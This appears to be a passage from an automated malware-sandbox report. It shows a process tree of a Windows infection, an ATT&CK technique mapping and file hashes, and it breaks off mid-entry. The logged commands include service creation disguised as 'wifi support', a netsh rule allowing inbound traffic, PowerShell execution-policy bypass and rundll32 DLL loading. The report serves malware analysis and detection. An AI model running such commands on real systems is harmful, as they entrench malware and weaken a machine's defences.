                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                          PID:5560
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:5932
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\13C0.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\13C0.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:7176
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\63A6.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\63A6.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:8100
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\63A6.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\63A6.exe
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:4872
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8D86.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8D86.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:5560
                                                                                                                                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rqwnmqaj\
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:8000
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\System32\cmd.exe /C mkdir C:\Windows\SysWOW64\rqwnmqaj\
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:8028
                                                                                                                                                                                                                                                                                                        • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                          "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\chgeuajy.exe" C:\Windows\SysWOW64\rqwnmqaj\
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:8124
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\System32\cmd.exe /C move /Y C:\Users\Admin\AppData\Local\Temp\chgeuajy.exe C:\Windows\SysWOW64\rqwnmqaj\
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:8148
                                                                                                                                                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                              "C:\Windows\svchost.com" "C:\Windows\System32\sc.exe" create rqwnmqaj binPath= "C:\Windows\SysWOW64\rqwnmqaj\chgeuajy.exe /d\"C:\Users\Admin\AppData\Local\Temp\8D86.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:7264
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\sc.exe create rqwnmqaj binPath= C:\Windows\SysWOW64\rqwnmqaj\chgeuajy.exe /d\"C:\Users\Admin\AppData\Local\Temp\8D86.exe\" type= own start= auto DisplayName= wifi support
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:8032
                                                                                                                                                                                                                                                                                                                • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                                  "C:\Windows\svchost.com" "C:\Windows\System32\sc.exe" description rqwnmqaj "wifi internet conection"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:3648
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\sc.exe description rqwnmqaj wifi internet conection
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:1100
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:5876
                                                                                                                                                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\Windows\System32\sc.exe" start rqwnmqaj
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:8284
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\sc.exe start rqwnmqaj
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:8360
                                                                                                                                                                                                                                                                                                                        • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                                          "C:\Windows\svchost.com" "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:8684
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:8704
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ADB1.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\ADB1.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:2444
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C61C.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C61C.exe
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:3580
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E2AD.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\E2AD.exe
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:5872
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\24C.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\24C.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:8744
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:8296
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkc4itrq\lkc4itrq.cmdline"
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:4460
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA8A1.tmp" "c:\Users\Admin\AppData\Local\Temp\lkc4itrq\CSCA39B99FFA9414A9482C8C84F9A2E01C.TMP"
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:6180
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:8664
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7104
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7840
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C5F.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C5F.exe
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:8936
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C5F.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\C5F.exe
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:9136
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3B60.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3B60.exe
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:9340
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4DA0.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4DA0.exe
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:9920
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:10140
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 11C191DECAF26496EC9FA8EB762AC348 C
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5560
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding E79ADEE59E3D8D6B4E688A77925AACBE
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4460
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\svchost.com" "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:9656
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\taskkill.exe /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                      PID:9496
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding B4DCA07E495D9DA53FA12E22AD11A238 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:5252
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6475.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\6475.exe
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:9772
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\603C03~1\sqtvvs.exe"
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:8344
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\603C03~1\sqtvvs.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\603C03~1\sqtvvs.exe
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:4468
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:9976
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:9692
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                            PID:6352
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:2172
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:7256
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:5720
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:3124
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:6380
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:8032
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:8592
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8480
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:9648

                                                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                                                                                                                            Change Default File Association

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1042

                                                                                                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                                                                                                            BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1197

                                                                                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              9d8943b42e7f926a62fc7b9acf703027

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              816cb627d8e6dca46f23555bbf2189987ee8f9fb

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              6693fc6ff371413243f434b49ac4ab29fbb0955937a6a023d3dbe143879a2f0d

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              4cb6df21a256e8d66553a110828ce0624f776cc3bd608e07d31db4ee4ea9caeaec0991c2e3080908c835cd96eac905575696f5da8da181af623c0f7db0dc6e3d

                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              9d8943b42e7f926a62fc7b9acf703027

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              816cb627d8e6dca46f23555bbf2189987ee8f9fb

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              6693fc6ff371413243f434b49ac4ab29fbb0955937a6a023d3dbe143879a2f0d

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              4cb6df21a256e8d66553a110828ce0624f776cc3bd608e07d31db4ee4ea9caeaec0991c2e3080908c835cd96eac905575696f5da8da181af623c0f7db0dc6e3d

                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon203f01ac7e6.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon203f01ac7e6.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon204014f13870f5e.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              5274c2ef1482b089970b8b606f7988b1

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              9445cb81692efb96cdf774512c2aa388ae103f26

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              235a9ab0c25a3ffb134ac3a1eca188b30adcc37fe8e2724527ea8087b65ba5a3

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              d72b0519d27225f0cd1e4efbf910cc1e82b7541b1954bf4e05d2eb1935f19025ff7689d5ed47e786241fd015a2a885fcd07a85e04b43505081e87b2b76a52835

                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon204014f13870f5e.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              5274c2ef1482b089970b8b606f7988b1

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              9445cb81692efb96cdf774512c2aa388ae103f26

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                              235a9ab0c25a3ffb134ac3a1eca188b30adcc37fe8e2724527ea8087b65ba5a3

                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                              d72b0519d27225f0cd1e4efbf910cc1e82b7541b1954bf4e05d2eb1935f19025ff7689d5ed47e786241fd015a2a885fcd07a85e04b43505081e87b2b76a52835

                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon206b909958ed4.exe
                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                              e7326b681ce6557f0cdd5a82797c07d5

                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                              49883439bc8a8f77f1dddda57328e44f9b7a5cf3

                                                                                                                                                                                                                                                                                                                                                                                              SHA256

